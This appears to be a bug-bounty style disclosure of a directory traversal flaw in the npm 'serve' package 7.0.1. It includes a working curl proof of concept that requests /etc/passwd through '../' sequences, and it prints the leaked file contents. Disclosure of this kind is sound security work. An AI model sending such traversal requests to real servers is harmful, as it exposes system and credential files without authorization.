I would like to report a Server Directory Traversal vulnerability in serve.
It allows reading local files on the target server.
module name: serveversion:7.0.1npm page: https://www.npmjs.com/package/serve
Assuming you would like to serve a static site, single page application or just a static file (no matter if on your device or on the local network), this package is just the right choice for you.
It behaves exactly like static deployments on Now, so it’s perfect for developing your static project. Then, when it’s time to push it into production, you deploy it.
Furthermore, it also provides a neat interface for listing the directory’s contents
$ npm i serve
$ ./node_modules/serve/bin/serve.js
/etc/passwd
on the target server:$ curl --path-as-is 'http://127.0.0.1:3000/../../../../../../etc/passwd'
##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
...
It allows reading local files on the target server